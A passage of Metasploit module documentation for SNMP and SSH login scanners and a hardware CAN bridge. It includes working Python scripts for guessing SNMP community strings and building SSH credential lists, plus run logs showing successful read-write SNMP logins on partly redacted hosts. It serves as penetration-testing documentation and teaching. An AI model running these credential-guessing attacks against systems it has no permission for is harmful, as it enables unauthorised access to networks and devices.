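    _, _req_id, pos = _read_tlv(pdu, 0)
    _, err_status, pos = _read_tlv(pdu, pos)
    _, _err_index, pos = _read_tlv(pdu, pos)
    _, varbinds, _ = _read_tlv(pdu, pos)
    error = int.from_bytes(err_status, "big", signed=True)
    value = None
    if error == 0 and varbinds:
        _, vb, _ = _read_tlv(varbinds, 0)
        _, _oid, p = _read_tlv(vb, 0)
        vtag, vval, _ = _read_tlv(vb, p)
        if vtag == 0x04:              # OCTET STRING; 0x80-0x82 are v2c exceptions
            value = vval
    return community.decode(errors="replace"), error, value

def try_communities(host, communities=DEFAULT_COMMUNITIES, port=161, timeout=2.0):
    """One GET per community; return {community: sysDescr} for those that answer."""
    hits = {}
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        for request_id, community in enumerate(communities, start=1):
            sock.sendto(build_get_request(community, request_id=request_id), (host, port))
            try:
                data, _ = sock.recvfrom(65535)
            except socket.timeout:
                continue               # wrong community: the agent drops the request
            _, error, value = parse_response(data)
            if error == 0 and value is not None:
                hits[community] = value.decode(errors="replace")
    finally:
        sock.close()
    return hits

if __name__ == "__main__":
    print(try_communities("127.0.0.1"))     # against the snmpd configured above
```

This only tells read access apart from no access; snmp_login additionally reports `read-write` by attempting a SET, which this example does not do.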
## Verification Steps
1. Install and configure SNMP
2. Start msfconsole
3. Do: `use auxiliary/scanner/snmp/snmp_login`
4. Do: `run`
## Scenarios
A run against the configuration from these docs
```
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf auxiliary(snmp_login) > run
[!] No active DB -- Credential data will not be saved!
[+] 127.0.0.1:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): Linux hostname 4.9.0-kali1-amd64 #1 SMP Debian 4.9.6-3kali2 (2017-01-30) x86_64
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Another example can be found at this [source](http://bitvijays.github.io/blog/2016/03/03/learning-from-the-field-basic-network-hygiene/):
```
[+] 10.10.xx.xx:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): Digi Connect ME Version 82000856_F6 07/21/2006
[+] 10.10.xx.xx:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): Digi Connect ME Version 82000856_F6 07/21/2006
[*] Scanned 24 of 58 hosts (41% complete)
[+] 10.11.xx.xx:161 - LOGIN SUCCESSFUL: private (Access level: read-write); Proof (sysDescr.0): ExtremeXOS version 12.2.2.11 v1222b11 by release-manager on Mon Mar 23 17:54:47 PDT 2009
[+] 10.11.xx.xx:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): ExtremeXOS version 12.2.2.11 v1222b11 by release-manager on Mon Mar 23 17:54:47 PDT 2009
[+] 10.11.xx.xx:161 - LOGIN SUCCESSFUL: private (Access level: read-write); Proof (sysDescr.0): ExtremeXOS version 12.2.2.11 v1222b11 by release-manager on Mon Mar 23 17:54:47 PDT 2009
[+] 10.11.xx.xx:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): ExtremeXOS version 12.2.2.11 v1222b11 by release-manager on Mon Mar 23 17:54:47 PDT 2009
[+] 10.11.xx.xx:161 - LOGIN SUCCESSFUL: private (Access level: read-write); Proof (sysDescr.0): ExtremeXOS version 12.2.2.11 v1222b11 by release-manager on Mon Mar 23 17:54:47 PDT 2009
[+] 10.11.xx.xx:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): ExtremeXOS version 12.2.2.11 v1222b11 by release-manager on Mon Mar 23 17:54:47 PDT 2009
[*] Scanned 29 of 58 hosts (50% complete)
[*] Scanned 35 of 58 hosts (60% complete)
[*] Scanned 41 of 58 hosts (70% complete)
[*] Scanned 47 of 58 hosts (81% complete)
[+] 10.25.xx.xx:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): Digi Connect ME Version 82000856_F6 07/21/2006
```
## Confirming
Since SNMP has been around for quite a while, there are many tools which can also be used to verify this configuration issue.
The following are other industry tools which can also be used.
SSH (Secure Shell) is an encrypted network protocol used to remotely interact with an Operating System at the command line level. SSH is available on almost every system, including Windows, but is mainly used by *nix administrators.
This module attempts to login to SSH with username and password combinations. For public/private SSH keys, please use `auxiliary/scanner/ssh/ssh_login_pubkey`.
It should be noted that some modern Operating Systems have default configurations that do not allow the `root` user to log in remotely via SSH, or only allow `root` to log in with an SSH key.
## Verification Steps
1. Install SSH and start it.
2. Start msfconsole
3. Do: `use auxiliary/scanner/ssh/ssh_login`
4. Do: `set rhosts`
5. Do: set usernames and passwords via any of the available options
6. Do: `run`
7. You will hopefully see something similar to the following, followed by a session:
**BLANK_PASSWORDS**
Boolean value on if an additional login attempt should be attempted with an empty password for every user.
**PASSWORD**
Password to try for each user.
**PASS_FILE**
A file containing a password on every line. Kali linux example: `/usr/share/wordlists/metasploit/password.lst`
**RHOSTS**
Either a comma space (`, `) separated list of hosts, or a file containing list of hosts, one per line. File Example: `file://root/ssh_hosts.lst`, list example: `192.168.0.1` or `192.168.0.1, 192.168.0.2`
**STOP_ON_SUCCESS**
If a valid login is found on a host, immediately stop attempting additional logins on that host.
**USERNAME**
Username to try for each password.
**USERPASS_FILE**
A file containing a username and password, separated by a space, on every line. An example line would be `username password`
**USER_AS_PASS**
Boolean value on if an additional login attempt should be attempted with the username as the password.
**USER_FILE**
A file containing a username on every line.
**VERBOSE**
Show a failed login attempt. This can get rather verbose when large `USER_FILE`s or `PASS_FILE`s are used. A failed attempt will look similar to the following:
```
[-] SSH - Failed: 'msfadmin:virtual'
```
## Option Combinations
It is important to note that usernames and passwords can be entered in multiple combinations. For instance, a password could be set in `PASSWORD`, be part of either `PASS_FILE` or `USERPASS_FILE`, be guessed via `USER_AS_PASS` or `BLANK_PASSWORDS`.
This module makes a combination of all of the above when attempting logins. So if a password is set in `PASSWORD`, and a `PASS_FILE` is listed, passwords will be generated from BOTH of these.
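The expansion described above, as an added example rather than the module's own (Ruby) code: the option names are the module's, while the order in which pairs are generated, the de-duplication, and the `try_login` stand-in for the real SSH attempt are this example's. The user and password lists are constructed, and `VALID` simply pretends two of the pairs work so that the effect of `STOP_ON_SUCCESS` can be seen.

```python
"""
How ssh_login turns USERNAME / USER_FILE / PASSWORD / PASS_FILE / USERPASS_FILE /
USER_AS_PASS / BLANK_PASSWORDS into (username, password) pairs, and what
STOP_ON_SUCCESS changes. Added example; option names are the module's, the
expansion order and de-duplication are this example's. All inputs are constructed.
"""

def _lines(text):
    """One entry per non-empty line, as the *_FILE options are read."""
    return [l.strip() for l in (text or "").splitlines() if l.strip()]

def build_credentials(username=None, user_file=None, password=None, pass_file=None,
                      userpass_file=None, user_as_pass=False, blank_passwords=False):
    """Every user source against every password source, plus the explicit
    pairs from USERPASS_FILE, each pair at most once."""
    users = ([username] if username else []) + _lines(user_file)
    passwords = ([password] if password else []) + _lines(pass_file)
    pairs, seen = [], set()

    def add(user, pwd):
        if (user, pwd) not in seen:
            seen.add((user, pwd))
            pairs.append((user, pwd))

    for line in _lines(userpass_file):           # "username password" per line
        user, _, pwd = line.partition(" ")
        add(user, pwd)
    for user in users:
        if blank_passwords:
            add(user, "")
        if user_as_pass:
            add(user, user)
        for pwd in passwords:
            add(user, pwd)
    return pairs

def attempt_host(pairs, try_login, stop_on_success=True, verbose=False):
    """Try the pairs against one host; try_login(user, pwd) -> bool.
    With STOP_ON_SUCCESS the first valid pair ends the run for this host."""
    found = []
    for user, pwd in pairs:
        if try_login(user, pwd):
            found.append((user, pwd))
            if stop_on_success:
                break
        elif verbose:
            print("[-] SSH - Failed: '%s:%s'" % (user, pwd))
    return found

# constructed inputs, not real wordlists
USER_FILE = "msfadmin\nubuntu\n"
PASS_FILE = "virtual\nchangeme\n"
USERPASS_FILE = "admin admin\n"
VALID = {("msfadmin", "msfadmin"), ("ubuntu", "changeme")}   # pretend these work

def demo(stop_on_success=True):
    pairs = build_credentials(username="root", user_file=USER_FILE, password="toor",
                              pass_file=PASS_FILE, userpass_file=USERPASS_FILE,
                              user_as_pass=True, blank_passwords=True)
    return pairs, attempt_host(pairs, lambda u, p: (u, p) in VALID, stop_on_success)

if __name__ == "__main__":
    pairs, found = demo()
    print(len(pairs), "pairs generated; found with STOP_ON_SUCCESS:", found)
```

With the constructed inputs, three users and five password sources per user plus the one explicit pair give 16 attempts against each host; in a real run that number is multiplied by the host count, which is why `STOP_ON_SUCCESS` matters.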
## Scenarios
Example run against:
* Ubuntu 14.04 Server with root login permitted: 192.168.2.156
SSH (Secure Shell) is an encrypted network protocol used to remotely interact with an Operating System at the command line level. SSH is available on almost every system, including Windows, but is mainly used by *nix administrators.
This module attempts to login to SSH with username and private key combinations. For username and password logins, please use `auxiliary/scanner/ssh/ssh_login`.
It should be noted that some modern Operating Systems have default configurations that do not allow the `root` user to log in remotely via SSH, or only allow `root` to log in with an SSH key.
### Key Generation
On most modern *nix Operating Systems, the `ssh-keygen` command can be utilized to create an SSH key. Metasploit expects the key to be unencrypted, so no passphrase should be set during `ssh-keygen`.
After following the prompts to create the SSH key pair, the public key needs to be added to the authorized_keys list. To do so simply run: `cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys`
## Verification Steps
1. Install SSH and start it.
2. Create an SSH keypair and add the public key to the `authorized_keys` file
3. Start msfconsole
4. Do: `use auxiliary/scanner/ssh/ssh_login_pubkey`
5. Do: `set rhosts`
6. Do: set usernames with one of the available options
7. Do: `set KEY_PATH` to either a single key file or a folder of keys
8. Do: `run`
9. You will hopefully see something similar to the following:
**KEY_PATH**
A path to the private key to attempt, or a folder containing private keys to attempt. Any file name starting with a period (`.`) or ending in `.pub` will be ignored.
An SSH key is typically kept in a user's home directory under `.ssh/id_rsa`. The file contents, when not encrypted with a passphrase, will start with `-----BEGIN RSA PRIVATE KEY-----`. Note that OpenSSH 7.8 and later write keys in their own format by default, starting with `-----BEGIN OPENSSH PRIVATE KEY-----`; `ssh-keygen -m PEM` produces the older PEM form if it is needed.
**RHOSTS**
Either a comma space (`, `) separated list of hosts, or a file containing list of hosts, one per line. File Example: `file://root/ssh_hosts.lst`, list example: `192.168.0.1` or `192.168.0.1, 192.168.0.2`
**STOP_ON_SUCCESS**
If a valid login is found on a host, immediately stop attempting additional logins on that host.
**USERNAME**
Username to try for each key.
**USER_FILE**
A file containing a username on every line.
**VERBOSE**
Show a failed login attempt. This can get rather verbose when large `USER_FILE`s or `KEY_PATH`s are used. A failed attempt will look similar to the following: `[-] SSH - Failed`
## Option Combinations
It is important to note that usernames can be entered in multiple combinations. For instance, a username could be set in `USERNAME`, and be part of `USER_FILE`.
This module makes a combination of all of the above when attempting logins. So if a username is set in `USERNAME`, and a `USER_FILE` is listed, usernames will be generated from BOTH of these.
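The following added example (not the module's code) walks a `KEY_PATH` folder the way the text above describes, skipping dotfiles and `.pub` files, sets aside keys that would need a passphrase, and pairs every remaining key with every username. It goes beyond the text in one respect: for keys in the newer OpenSSH format it reads the cipher name out of the `openssh-key-v1` header to decide whether the key is encrypted. `make_sample_keydir` writes constructed, non-functional stand-in files purely so the walk has something to classify; the file names are assumptions.

```python
"""
KEY_PATH handling as ssh_login_pubkey describes it, plus username pairing.
Added example, not the module's code. make_sample_keydir creates constructed
stand-in files; none of them is a real private key.
"""
import base64, binascii, os, tempfile

def classify_key_file(path):
    """'ignored' | 'not-a-key' | 'encrypted' | 'unencrypted'."""
    name = os.path.basename(path)
    if name.startswith(".") or name.endswith(".pub"):
        return "ignored"
    with open(path, "rb") as f:
        data = f.read()
    if not data.startswith(b"-----BEGIN "):
        return "not-a-key"
    first_line = data.split(b"\n", 1)[0]
    if b"OPENSSH PRIVATE KEY" in first_line:
        # new format (ssh-keygen default since OpenSSH 7.8): the base64 body starts
        # with "openssh-key-v1\0" followed by a length-prefixed cipher name
        body = b"".join(l.strip() for l in data.splitlines() if not l.startswith(b"-----"))
        try:
            raw = base64.b64decode(body, validate=True)
        except (binascii.Error, ValueError):
            return "not-a-key"
        magic = b"openssh-key-v1\x00"
        if not raw.startswith(magic):
            return "not-a-key"
        n = int.from_bytes(raw[len(magic):len(magic) + 4], "big")
        cipher = raw[len(magic) + 4:len(magic) + 4 + n]
        return "unencrypted" if cipher == b"none" else "encrypted"
    # PEM ("BEGIN RSA/EC/DSA PRIVATE KEY"): passphrase-protected keys carry
    # a "Proc-Type: 4,ENCRYPTED" header
    return "encrypted" if b"ENCRYPTED" in data else "unencrypted"

def enumerate_keys(folder):
    """Return ({file name: kind}, [paths the module would actually try])."""
    kinds, usable = {}, []
    for name in sorted(os.listdir(folder)):
        path = os.path.join(folder, name)
        if not os.path.isfile(path):
            continue
        kinds[name] = classify_key_file(path)
        if kinds[name] == "unencrypted":
            usable.append(path)
    return kinds, usable

def build_attempts(usernames, key_paths):
    """Every username with every usable key, as USERNAME/USER_FILE are combined."""
    return [(user, key) for user in usernames for key in key_paths]

def make_sample_keydir():
    """Constructed stand-ins for a ~/sshkeys folder; none of these are real keys."""
    folder = tempfile.mkdtemp(prefix="sshkeys-")

    def openssh_blob(cipher):
        raw = b"openssh-key-v1\x00" + len(cipher).to_bytes(4, "big") + cipher + b"\x00" * 16
        return (b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(raw)
                + b"\n-----END OPENSSH PRIVATE KEY-----\n")

    files = {
        "id_rsa": b"-----BEGIN RSA PRIVATE KEY-----\nAAAAconstructed\n-----END RSA PRIVATE KEY-----\n",
        "id_rsa.pub": b"ssh-rsa AAAA user@host\n",
        "id_rsa_locked": b"-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                         b"DEK-Info: AES-128-CBC,00\n\nAAAA\n-----END RSA PRIVATE KEY-----\n",
        "id_ed25519": openssh_blob(b"none"),
        "id_ed25519_locked": openssh_blob(b"aes256-ctr"),
        ".known_hosts": b"",
        "notes.txt": b"not a key\n",
    }
    for name, content in files.items():
        with open(os.path.join(folder, name), "wb") as f:
            f.write(content)
    return folder

if __name__ == "__main__":
    kinds, usable = enumerate_keys(make_sample_keydir())
    print(kinds)
    print(build_attempts(["ubuntu", "root"], usable))
```

Keys reported as `encrypted` are the ones the module cannot use as-is, since it expects unencrypted keys; decrypt them with `ssh-keygen -p` (setting an empty passphrase) before pointing `KEY_PATH` at the folder.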
## Scenarios
Example run with a FOLDER set for `KEY_PATH` against:
* Ubuntu 14.04 Server
While the two SSH keys are nearly identical, one character has been modified in one of them to prevent a successful login.
```
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > set rhosts 192.168.2.156
rhosts => 192.168.2.156
msf auxiliary(ssh_login_pubkey) > set username ubuntu
username => ubuntu
msf auxiliary(ssh_login_pubkey) > set key_path /root/sshkeys/
```
This is a sample hardware bridge that demonstrates how to connect the HWBridge API to Metasploit.
It demonstrates the bare minimum capabilities needed to report back to the hardware connector and
establish a hwbridge session. This module provides an example of how to connect any hardware
component to Metasploit. It is also a fully functional interface to SocketCAN and will work
to create an automotive HW Bridge.
## Set up a Test
To experiment with using Metasploit to send automotive CAN bus packets you can use
the SocketCAN capabilities of Linux to create a virtual CAN device. NOTE: If you have a
supported CAN sniffer you could also use a real CAN device.
In order for the local_hwbridge to interface with SocketCAN you will need:
* can-utils
Once that is installed you can set up a virtual CAN interface using:
```
sudo modprobe can
sudo modprobe vcan
sudo ip link add dev vcan0 type vcan
sudo ip link set up vcan0
```
Once that is set up you can simply launch the module and it should auto-detect any
CAN interfaces you have active on the system.
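Before involving the bridge at all, it is worth confirming that frames actually move over `vcan0`. The following is an added example, not part of local_hwbridge, that talks to SocketCAN directly from Python: it packs a classic CAN frame in the kernel's `struct can_frame` layout (32-bit id with flag bits, 8-bit length, 3 pad bytes, 8 data bytes), sends it from one socket and reads it back on a second socket bound to the same interface. The interface name, the id `0x7DF` and the data bytes are constructed sample values.

```python
"""
Send a frame over the virtual CAN bus set up above and read it back.
Added example, not the local_hwbridge module's code; uses Python's
SocketCAN support (Linux only). Sample id/data are constructed.
"""
import socket, struct

CAN_FRAME_FMT = "=IB3x8s"                  # struct can_frame: 16 bytes
CAN_EFF_FLAG = 0x80000000                  # extended (29-bit) identifier flag
CAN_SFF_MASK, CAN_EFF_MASK = 0x7FF, 0x1FFFFFFF

def pack_frame(can_id, data):
    """Build a classic CAN frame; ids wider than 11 bits become extended frames."""
    if not 0 <= len(data) <= 8:
        raise ValueError("classic CAN carries at most 8 data bytes")
    if can_id > CAN_SFF_MASK:
        can_id = (can_id & CAN_EFF_MASK) | CAN_EFF_FLAG
    return struct.pack(CAN_FRAME_FMT, can_id, len(data), data.ljust(8, b"\x00"))

def unpack_frame(raw):
    """Return (arbitration id, is_extended, data) from 16 raw bytes."""
    can_id, length, data = struct.unpack(CAN_FRAME_FMT, raw)
    extended = bool(can_id & CAN_EFF_FLAG)
    arb_id = can_id & (CAN_EFF_MASK if extended else CAN_SFF_MASK)
    return arb_id, extended, data[:length]

def open_can(iface, timeout=1.0):
    """Raw SocketCAN socket bound to an interface such as 'vcan0'."""
    sock = socket.socket(socket.AF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
    sock.settimeout(timeout)
    sock.bind((iface,))
    return sock

def send_and_sniff(iface, can_id, data):
    """Send from one socket and read the frame back on a second socket on the
    same interface: SocketCAN delivers local frames to other sockets by default."""
    rx, tx = open_can(iface), open_can(iface)
    try:
        tx.send(pack_frame(can_id, data))
        return unpack_frame(rx.recv(16))
    finally:
        rx.close()
        tx.close()

if __name__ == "__main__":
    # constructed sample: an OBD-II style functional request on id 0x7DF
    try:
        print(send_and_sniff("vcan0", 0x7DF, b"\x02\x01\x0c"))
    except (OSError, AttributeError) as exc:
        print("SocketCAN not available here:", exc)
```

`candump vcan0` from can-utils, run in a second terminal, should show the same frame; if it does not, the module has nothing to auto-detect either.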
```
msf > use auxiliary/server/local_hwbridge
msf auxiliary(local_hwbridge) > run
[*] Auxiliary module execution completed
[*] Using URL: http://0.0.0.0:8080/xaUKu68Va
[*] Local IP: http://10.1.10.21:8080/xaUKu68Va
[*] Server started.
```
By default it will create a random URI, in this case it's xaUKu68Va.
## Connecting to the HWBridge
You will need to use auxiliary/client/hwbridge/connect to connect
to the local_hwbridge. You can either use the same machine or another machine to
connect to your local_hwbridge. Just make sure the TARGETURI matches the randomly
generated URI:
```
set TARGETURI xaUKu68Va
```
Then simply type run and you should connect to the HW bridge and a hwbridge session
should be established. You can switch to the hwbridge session to interact with
this module.
See the documentation for auxiliary/client/hwbridge/connect for more information on
the hwbridge sessions.